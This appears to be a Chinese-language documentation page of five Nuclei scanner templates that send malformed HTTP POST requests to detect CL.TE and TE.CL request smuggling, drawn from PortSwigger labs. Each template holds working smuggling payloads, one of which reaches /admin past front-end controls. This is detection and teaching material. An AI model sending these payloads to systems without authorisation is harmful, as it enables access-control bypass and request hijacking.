基础 CL.TE
此模板使用 rawhttp 库创建定义的畸形 HTTP POST 请求,并检查响应中的字符串匹配。Copy
id: CL-TE-http-smuggling
info:
name: HTTP 请求走私,基础 CL.TE 漏洞
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body, "Unrecognized method GPOST")'
基础 TE.CL
此模板使用 rawhttp 库创建定义的畸形 HTTP POST 请求,并检查响应中的字符串匹配。Copy
id: TE-CL-http-smuggling
info:
name: HTTP 请求走私,基础 TE.CL 漏洞
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body, "Unrecognized method GPOST")'
前端绕过 CL.TE
此模板使用 rawhttp 库创建定义的畸形 HTTP POST 请求,并检查响应中的字符串匹配。Copy
id: smuggling-bypass-front-end-controls-cl-te
info:
name: HTTP 请求走私绕过前端安全控制,CL.TE 漏洞
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body, "/admin/delete?username=carlos")'
基于差异响应的 CL.TE
此模板使用 rawhttp 库创建定义的畸形 HTTP POST 请求,并检查响应中的字符串匹配。Copy
id: confirming-cl-te-via-differential-responses-http-smuggling
info:
name: HTTP 请求走私,通过差异响应确认 CL.TE 漏洞
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-cl-te-via-differential-responses
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: X
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: X
unsafe: true
matchers:
- type: dsl
dsl:
- 'status_code==404'
基于差异响应的 TE.CL
此模板使用 rawhttp 库创建定义的畸形 HTTP POST 请求,并检查响应中的字符串匹配。Copy
id: confirming-te-cl-via-differential-responses-http-smuggling
info:
name: HTTP 请求走私,通过差异响应确认 TE.CL 漏洞
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
unsafe: true
matchers:
- type: dsl
dsl:
- 'status_code==404'